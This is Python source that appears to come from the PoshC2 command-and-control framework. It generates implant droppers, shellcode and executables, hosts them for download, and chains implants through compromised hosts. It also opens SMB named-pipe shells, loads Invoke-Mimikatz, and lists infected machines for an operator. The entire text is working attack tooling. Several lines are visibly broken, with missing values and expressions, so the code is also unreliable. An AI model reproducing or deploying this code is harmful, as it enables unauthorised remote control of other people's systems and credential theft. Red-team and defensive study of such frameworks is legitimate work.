def do_invoke_wmijspbindpayload(user, command, randomuri): check_module_loaded("New-JScriptShell.ps1", randomuri, user) with open("%s%sDotNet2JS_PBind.b64" % (PayloadsDirectory, ""), "r") as p: payload = params = re.compile("invoke-wmijspbindpayload ", re.IGNORECASE) params = params.sub("", command) new_task( "$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS_PBind.b64" % (PayloadsDirectory, "")), user, randomuri) cmd = "new-jscriptshell %s -payload $Shellcode64" % (params) new_task(cmd, user, randomuri) target ="(?<=-target )\\S*", str(cmd), re.IGNORECASE) C2 = get_c2server_all() print() print("To connect to the SMB named pipe use the following command:") print( f"{Colours.GREEN}invoke-pbind -target {target[0]} -secret {PBindSecret} -key {C2.EncKey} -pname {PBindPipeName} -client{Colours.END}" ) print() print("To issue commands to the SMB named pipe use the following command:") print(Colours.GREEN + "pbind-command \"pwd\"" + Colours.END) print() print("To load modules to the SMB named pipe use the following command:") print(Colours.GREEN + "pbind-loadmodule Invoke-Mimikatz.ps1" + Colours.END) print() print("To kill the SMB named pipe use the following command:") print(Colours.GREEN + "pbind-kill" + Colours.END)
def do_createnewpayload(user, command, creds=None, shellcodeOnly=False): params = re.compile("createnewpayload ", re.IGNORECASE) params = params.sub("", command) creds = None if "-credid" in params: creds, params = get_creds_from_params(params, user) if creds is None: return if not creds['Password']: print_bad("This command does not support credentials with hashes") input("Press Enter to continue...") clear() return name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ") comms_url = input("Domain or URL in array format:, ") domainfront = input("Domain front URL in array format:, ") proxyurl = input("Proxy URL: .e.g. ") pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ") pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ") comms_url, PayloadCommsHostCount = string_to_array(comms_url) domainfront, DomainFrontHeaderCount = string_to_array(domainfront) if PayloadCommsHostCount == DomainFrontHeaderCount: pass else: print("[-] Error - different number of host headers and URLs") input("Press Enter to continue...") clear() proxyuser = "" proxypass = "" credsexpire = "" if proxyurl: if creds is not None: proxyuser = "******" % (creds['Domain'], creds['Username']) proxypass = creds['Password'] else: proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ") proxypass = input("Proxy Password: e.g. Password1 ") credsexpire = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ") imurl = "%s?p" % get_newimplanturl() else: imurl = get_newimplanturl() C2 = get_c2server_all() urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire) newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl, PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret) if shellcodeOnly: newPayload.CreateDroppers("%s_" % name) newPayload.CreateShellcode("%s_" % name) else: newPayload.CreateAll("%s_" % name) print_good("Created new payloads") input("Press Enter to continue...") clear()
def do_createdaisypayload(user, command): name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ") default_url = get_first_url(PayloadCommsHost, DomainFrontHeader) daisyurl = input(f"Daisy URL: e.g. {default_url} ") if ("" in daisyurl): daisyurl = daisyurl.replace("", "http://localhost") if ("" in daisyurl): daisyurl = daisyurl.replace("", "https://localhost") daisyhostid = input("Select Daisy Implant Host: e.g. 5 ") daisyhost = get_implantbyid(daisyhostid) proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" pbindsecret = PBindSecret pbindpipename = PBindPipeName daisyurl, daisyurl_count = string_to_array(daisyurl) daisyhostheader = "" c = 0 daisyurls = daisyurl.split(",") for url in daisyurls: if c > 0: daisyhostheader += ",\"\"" else: daisyhostheader += "\"\"" c += 1 C2 = get_c2server_all() urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "") newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret) newPayload.PSDropper = (newPayload.PSDropper).replace( "$pid;%s" % (daisyurl), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain)) newPayload.CreateDroppers("%s_" % name) newPayload.CreateShellcode("%s_" % name) newPayload.CreateRaw("%s_" % name) newPayload.CreateDlls("%s_" % name) newPayload.CreateEXE("%s_" % name) newPayload.CreateMsbuild("%s_" % name) newPayload.CreateDonutShellcode("%s_" % name) newPayload.BuildDynamicPayloads("%s_" % name) print_good("Created new %s daisy payloads" % name) input("Press Enter to continue...") clear()
def do_show_serverinfo(user, command): C2 = get_c2server_all() detailsformatted = "\nPayloadCommsHost: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nGET_404_Response: %s\nPoshProjectDirectory: %s\nQuickCommand: %s\nDownloadURI: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nURLS: %s\nSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nPushover_APIToken: %s\nPushover_APIUser: %s\nEnableNotifications: %s\n" % ( C2.PayloadCommsHost, C2.EncKey, C2.DomainFrontHeader, C2.DefaultSleep, C2.KillDate, C2.GET_404_Response, C2.PoshProjectDirectory, C2.QuickCommand, C2.DownloadURI, C2.ProxyURL, C2.ProxyUser, C2.ProxyPass, C2.URLS, C2.SocksURLS, C2.Insecure, C2.UserAgent, C2.Referrer, C2.Pushover_APIToken, C2.Pushover_APIUser, C2.EnableNotifications) print_good(detailsformatted) input("Press Enter to continue...") clear()
def newdb(db): print("Initializing new project folder and %s database" % db.value + Colours.GREEN) print("") directory = os.path.dirname(PoshProjectDirectory) if not os.path.exists(directory): os.makedirs(directory) if not os.path.exists("%s/downloads" % directory): os.makedirs("%s/downloads" % directory) if not os.path.exists("%s/reports" % directory): os.makedirs("%s/reports" % directory) if not os.path.exists("%s/payloads" % directory): os.makedirs("%s/payloads" % directory) initializedb() if not validate_sleep_time(DefaultSleep): print(Colours.RED) print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h") print(Colours.GREEN) sys.exit(1) setupserver(PayloadCommsHost, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, GET_404_Response, PoshProjectDirectory, QuickCommand, DownloadURI, "", "", "", URLS, SocksURLS, Insecure, UserAgent, Referrer, Pushover_APIToken, Pushover_APIUser, Slack_UserID, Slack_Channel, Slack_BotToken, EnableNotifications) rewriteFile = "%s/rewrite-rules.txt" % directory print("Creating Rewrite Rules in: " + rewriteFile) rewriteHeader = ["RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2", "Define SharpSocks", "# If running Apache 2.4.52 or Later", "Proxy100Continue Off"] rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules() with open(rewriteFile, 'w') as outFile: for line in rewriteFileContents: outFile.write(line) outFile.write('\n') outFile.close() C2 = get_c2server_all() urlId = new_urldetails("default", C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "") newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, get_newimplanturl(), PayloadsDirectory, URLID=urlId) newPayload.CreateAll() create_self_signed_cert(PoshProjectDirectory) newPayload.WriteQuickstart(directory + '/quickstart.txt') # adding default hosted payloads QuickCommandURI = select_item("QuickCommand", "C2Server") insert_hosted_file("%ss/86/portal" % QuickCommandURI, "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes") insert_hosted_file("%ss/64/portal" % QuickCommandURI, "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes") insert_hosted_file("%sp/86/portal" % QuickCommandURI, "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%sp/64/portal" % QuickCommandURI, "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%s_ex86" % QuickCommandURI, "%sPosh_v4_dropper_x86.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%s_ex64" % QuickCommandURI, "%sPosh_v4_dropper_x64.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%s_bs" % QuickCommandURI, "%spayload.bat" % (PayloadsDirectory), "text/html", "No", "Yes") insert_hosted_file("%s_rp" % QuickCommandURI, "%spayload.txt" % (PayloadsDirectory), "text/html", "Yes", "Yes") insert_hosted_file("%s_rg" % QuickCommandURI, "%srg_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes") insert_hosted_file("%s_cs" % QuickCommandURI, "%scs_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes") insert_hosted_file("%s_py" % QuickCommandURI, "" % (PayloadsDirectory), "text/html", "No", "Yes")
def existingdb(db): print("Using existing %s database / project" % db.value + Colours.GREEN) database_connect() C2 = get_c2server_all() if ((C2.PayloadCommsHost == PayloadCommsHost) and (C2.DomainFrontHeader == DomainFrontHeader)): qstart = "%squickstart.txt" % (PoshProjectDirectory) if os.path.exists(qstart): with open(qstart, 'r') as f: print( else: print("Error different IP so regenerating payloads") if os.path.exists("%spayloads_old" % PoshProjectDirectory): import shutil shutil.rmtree("%spayloads_old" % PoshProjectDirectory) os.rename("%spayloads" % PoshProjectDirectory, "%spayloads_old" % PoshProjectDirectory) os.makedirs("%spayloads" % PoshProjectDirectory) update_item("PayloadCommsHost", "C2Server", PayloadCommsHost) update_item("QuickCommand", "C2Server", QuickCommand) update_item("DomainFrontHeader", "C2Server", DomainFrontHeader) C2 = get_c2server_all() urlId = new_urldetails(f"updated_host-{datetime.strftime(, '%Y-%m-%d-%H:%M:%S')}", PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "") newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, get_newimplanturl(), PayloadsDirectory, URLID=urlId) newPayload.CreateAll() newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt') # adding default hosted payloads QuickCommandURI = select_item("QuickCommand", "C2Server") insert_hosted_file("%ss/86/portal" % QuickCommandURI, "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes") insert_hosted_file("%ss/64/portal" % QuickCommandURI, "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes") insert_hosted_file("%sp/86/portal" % QuickCommandURI, "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%sp/64/portal" % QuickCommandURI, "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%s_ex86" % QuickCommandURI, "%sPosh_v4_dropper_x86.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%s_ex64" % QuickCommandURI, "%sPosh_v4_dropper_x64.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%s_bs" % QuickCommandURI, "%spayload.bat" % (PayloadsDirectory), "text/html", "No", "Yes") insert_hosted_file("%s_rp" % QuickCommandURI, "%spayload.txt" % (PayloadsDirectory), "text/html", "Yes", "Yes") insert_hosted_file("%s_rg" % QuickCommandURI, "%srg_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes") insert_hosted_file("%s_cs" % QuickCommandURI, "%scs_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes") insert_hosted_file("%s_py" % QuickCommandURI, "" % (PayloadsDirectory), "text/html", "No", "Yes")
def main(args): httpd = ThreadedHTTPServer((BindIP, BindPort), MyHandler) global new_implant_url, sharpurls, hosted_files, KEY, QuickCommandURI try: if == 'nt': os.system('cls') else: os.system('clear') except Exception: print("cls") print(chr(27) + "[2J") print(Colours.GREEN + logopic) print(Colours.END + "") try: if db_exists(): if len(os.listdir(PoshProjectDirectory)) > 2: existingdb(DatabaseType) else: print(Colours.RED + "[-] Project directory does not exist or is empty \n") print(Colours.RED + "[>] Create new DB and remove dir (%s) \n" % PoshProjectDirectory) sys.exit(1) else: newdb(DatabaseType) except Exception as e: print(str(e)) traceback.print_exc() print(Colours.RED + "[>] Create new DB and remove dir (%s) \n" % PoshProjectDirectory) sys.exit(1) C2 = get_c2server_all() print("" + Colours.GREEN) print("CONNECT URL: " + get_newimplanturl() + Colours.GREEN) print("QUICKCOMMAND URL: " + select_item("QuickCommand", "C2Server") + Colours.GREEN) print("WEBSERVER Log: %swebserver.log" % PoshProjectDirectory) print("") print("PayloadCommsHost: " + select_item("PayloadCommsHost", "C2Server") + Colours.GREEN) print("DomainFrontHeader: " + str(select_item("DomainFrontHeader", "C2Server")) + Colours.GREEN) QuickCommandURI = select_item("QuickCommand", "C2Server") KEY = get_baseenckey() new_implant_url = get_newimplanturl() sharpurls = get_sharpurls().split(",") hosted_files = get_hosted_files() print("") print(time.asctime() + " PoshC2 Server Started - %s:%s" % (BindIP, BindPort)) killdate = datetime.strptime(C2.KillDate, '%Y-%m-%d').date() datedifference = number_of_days(, killdate) if datedifference < 8: print(Colours.RED + ("\nKill Date is - %s - expires in %s days" % (C2.KillDate, datedifference))) else: print(Colours.GREEN + ("\nKill Date is - %s - expires in %s days" % (C2.KillDate, datedifference))) print(Colours.END) if "https://" in PayloadCommsHost.strip(): if (os.path.isfile("%sposh.crt" % PoshProjectDirectory)) and (os.path.isfile("%sposh.key" % PoshProjectDirectory)): try: httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLS) except Exception: httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1) else: raise ValueError("Cannot find the certificate files") c2_message_thread = threading.Thread(target=log_c2_messages, daemon=True) c2_message_thread.start() try: httpd.serve_forever() except (KeyboardInterrupt, EOFError): httpd.server_close() print(time.asctime() + " PoshC2 Server Stopped - %s:%s" % (BindIP, BindPort)) sys.exit(0)
def implant_handler_command_loop(user, printhelp="", autohide=None): while (True): session = PromptSession(history=FileHistory('%s/.top-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory()) try: if user is not None: print("User: "******"%s%s" % (user, Colours.GREEN)) print() C2 = get_c2server_all() killdate = datetime.strptime(C2.KillDate, '%Y-%m-%d').date() datedifference = number_of_days(, killdate) if datedifference < 8: print(Colours.RED + ("\nKill Date is - %s - expires in %s days" % (C2.KillDate, datedifference))) print(Colours.END) print() implants = get_implants() if implants: for implant in implants: ID = implant.ImplantID LastSeen = implant.LastSeen Hostname = implant.Hostname Domain = implant.Domain URLID = implant.URLID DomainUser = implant.User Arch = implant.Arch PID = implant.PID Pivot = implant.Pivot Sleep = implant.Sleep.strip() Label = implant.Label apmsuspendshut = False pwrStatus = get_powerstatusbyrandomuri(implant.RandomURI) if pwrStatus is not None: if Label is not None: Label += " " else: Label = "" apmstatus = pwrStatus[2].lower() if (apmstatus == "shutdown"): Label += "SHTDWN " apmsuspendshut = True elif (apmstatus == "suspend" or apmstatus == "querysuspend"): Label += "SUSPND " apmsuspendshut = True if not apmsuspendshut: if (pwrStatus[7]): Label += "LOCKED " if (not pwrStatus[8]): Label += "SCRN OFF " if (not pwrStatus[3]): if (pwrStatus[6] is not None and pwrStatus[6].isdigit()): Label += ("DSCHRG: %s%% " % pwrStatus[6]) else: Label += ("DSCHRG ") Pivot = get_implant_type_prompt_prefix(ID) LastSeenTime = datetime.strptime(LastSeen, "%Y-%m-%d %H:%M:%S") LastSeenTimeString = datetime.strftime( LastSeenTime, "%Y-%m-%d %H:%M:%S") now = if (Sleep.endswith('s')): sleep_int = int(Sleep[:-1]) elif (Sleep.endswith('m')): sleep_int = int(Sleep[:-1]) * 60 elif (Sleep.endswith('h')): sleep_int = int(Sleep[:-1]) * 60 * 60 else: print(Colours.RED) print("Incorrect sleep format: %s" % Sleep) print(Colours.GREEN) continue nowMinus3Beacons = now - timedelta(seconds=(sleep_int * 3)) nowMinus10Beacons = now - timedelta(seconds=(sleep_int * 10)) nowMinus30Beacons = now - timedelta(seconds=(sleep_int * 30)) sID = "[" + str(ID) + "]" if not Label: sLabel = "" else: Label = Label.strip() sLabel = Colours.BLUE + "[" + Label + "]" + Colours.GREEN if "C#;PB" in Pivot: print( Colours.BLUE + "%s: Seen:%s | PID:%s | %s | PBind | %s\\%s @ %s (%s) %s %s" % (sID.ljust(4), LastSeenTimeString, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot, sLabel)) elif nowMinus30Beacons > LastSeenTime and autohide: pass elif nowMinus10Beacons > LastSeenTime: print( Colours.RED + "%s: Seen:%s | PID:%s | %s | URLID: %s | %s\\%s @ %s (%s) %s %s" % (sID.ljust(4), LastSeenTimeString, PID.ljust(5), Sleep, URLID, Domain, DomainUser, Hostname, Arch, Pivot, sLabel)) elif nowMinus3Beacons > LastSeenTime: print( Colours.YELLOW + "%s: Seen:%s | PID:%s | %s | URLID: %s | %s\\%s @ %s (%s) %s %s" % (sID.ljust(4), LastSeenTimeString, PID.ljust(5), Sleep, URLID, Domain, DomainUser, Hostname, Arch, Pivot, sLabel)) else: print( Colours.GREEN + "%s: Seen:%s | PID:%s | %s | URLID: %s | %s\\%s @ %s (%s) %s %s" % (sID.ljust(4), LastSeenTimeString, PID.ljust(5), Sleep, URLID, Domain, DomainUser, Hostname, Arch, Pivot, sLabel)) else: now = print(Colours.RED + "No Implants as of: %s" % now.strftime("%Y-%m-%d %H:%M:%S")) if printhelp: print(printhelp) command = session.prompt( "\nSelect ImplantID or ALL or Comma Separated List (Enter to refresh):: ", completer=FirstWordFuzzyWordCompleter(SERVER_COMMANDS, WORD=True)) print("") command = command.strip() if (command == "") or (command == "back") or (command == "clear"): do_back(user, command) continue if command.startswith("generate-reports"): do_generate_reports(user, command) continue if command.startswith("generate-csvs"): do_generate_csvs(user, command) continue if command.startswith("message "): do_message(user, command) continue if command.startswith("show-hosted-files"): do_show_hosted_files(user, command) continue if command.startswith("add-hosted-file"): do_add_hosted_file(user, command) continue if command.startswith("disable-hosted-file"): do_disable_hosted_file(user, command) continue if command.startswith("enable-hosted-file"): do_enable_hosted_file(user, command) continue if command.startswith("show-urls") or command.startswith( "list-urls"): do_show_urls(user, command) continue if command.startswith("add-autorun"): do_add_autorun(user, command) continue if command.startswith("list-autorun"): do_list_autoruns(user, command) continue if command.startswith("del-autorun"): do_del_autorun(user, command) continue if command.startswith("nuke-autorun"): do_nuke_autoruns(user, command) continue if command.startswith("kill"): do_del_task(user, command) continue if (command == "automigrate-frompowershell") or (command == "am"): do_automigrate_frompowershell(user, command) continue if command.startswith("show-serverinfo"): do_show_serverinfo(user, command) continue if command.startswith("turnoff-notifications"): do_turnoff_notifications(user, command) continue if command.startswith("turnon-notifications"): do_turnon_notifications(user, command) continue if command.startswith("set-pushover-applicationtoken"): do_set_pushover_applicationtoken(user, command) continue if command.startswith("set-pushover-userkeys"): do_set_pushover_userkeys(user, command) continue if command.startswith("get-killdate"): do_get_killdate(user, command) continue if command.startswith("set-killdate"): do_set_killdate(user, command) continue if command.startswith("set-defaultbeacon"): do_set_defaultbeacon(user, command) continue if command == "get-opsec-events": do_get_opsec_events(user, command) continue if command == "add-opsec-event": do_insert_opsec_events(user, command) continue if command == "del-opsec-event": do_del_opsec_events(user, command) continue if command.startswith("opsec"): do_opsec(user, command) continue if command.startswith("listmodules"): do_listmodules(user, command) continue if command.startswith('creds ') or command.strip() == "creds": do_creds(user, command) input("Press Enter to continue...") clear() continue if (command == "pwnself") or (command == "p"): do_pwnself(user, command) continue if command == "tasks": do_tasks(user, command) continue if command == "cleartasks": do_cleartasks(user, command) continue if command.startswith("quit"): do_quit(user, command) continue if command.startswith("createdaisypayload"): do_createdaisypayload(user, command) continue if command.startswith("createproxypayload"): do_createnewpayload(user, command) continue if command.startswith("createnewpayload"): do_createnewpayload(user, command) continue if command.startswith("createnewshellcode"): do_createnewpayload(user, command, shellcodeOnly=True) continue if command == "help": do_help(user, command) continue if command == "history": do_history(user, command) continue if command.startswith("use "): do_use(user, command) implant_command_loop(command, user) except KeyboardInterrupt: clear() continue except EOFError: new_c2_message("%s logged off." % user) sys.exit(0) except Exception as e: if 'unable to open database file' not in str(e): print_bad("Error: %s" % e) traceback.print_exc()
def do_startdaisy(user, command, randomuri): check_module_loaded("invoke-daisychain.ps1", randomuri, user) elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END) domain_front = "" proxy_user = "" proxy_pass = "" proxy_url = "" cred_expiry = "" if elevated.lower() == "n": cont = input( Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END) if cont.lower() == "n" or cont == "": return bind_ip = "localhost" else: bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END) bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END) firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END) default_url = get_first_url(PayloadCommsHost, DomainFrontHeader) default_df_header = get_first_dfheader(DomainFrontHeader) if default_df_header == default_url: default_df_header = None if firstdaisy.lower() == "y" or firstdaisy == "": upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {default_url}): " + Colours.END) domain_front = input( Colours.GREEN + f"Domain front header (leave blank for {str(default_df_header)}): " + Colours.END) proxy_user = input( Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END) proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END) proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END) cred_expiry = input( Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018: ") if not upstream_url: upstream_url = default_url if not domain_front: if default_df_header: domain_front = default_df_header else: domain_front = "" else: upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END) upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END) upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}" command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}" if domain_front: command = command + f" -domfront {domain_front}" if proxy_url: command = command + f" -proxyurl '{proxy_url}'" if proxy_user: command = command + f" -proxyuser '{proxy_user}'" if proxy_pass: command = command + f" -proxypassword '{proxy_pass}'" if elevated.lower() == "y" or elevated == "": firewall = input(Colours.GREEN + "Add firewall rule? (uses netsh.exe) y/N: ") if firewall.lower() == "n" or firewall == "": command = command + " -nofwrule" else: print_good( "Not elevated so binding to localhost and not adding firewall rule" ) command = command + " -localhost" urls = get_allurls() command = command + f" -urls '{urls}'" new_task(command, user, randomuri) update_label("DaisyHost", randomuri) createpayloads = input( Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ") if createpayloads.lower() == "y" or createpayloads == "": name = input(Colours.GREEN + "Enter a payload name: " + Colours.END) daisyhost = get_implantdetails(randomuri) proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" C2 = get_c2server_all() urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"", "\"\"", proxy_url, proxy_user, proxy_pass, cred_expiry) newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, URLID=urlId, PowerShellProxyCommand=proxynone) newPayload.PSDropper = (newPayload.PSDropper).replace( "$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain)) newPayload.CreateDroppers(name) newPayload.CreateRaw(name) newPayload.CreateDlls(name) newPayload.CreateShellcode(name) newPayload.CreateEXE(name) newPayload.CreateMsbuild(name) print_good("Created new %s daisy payloads" % name)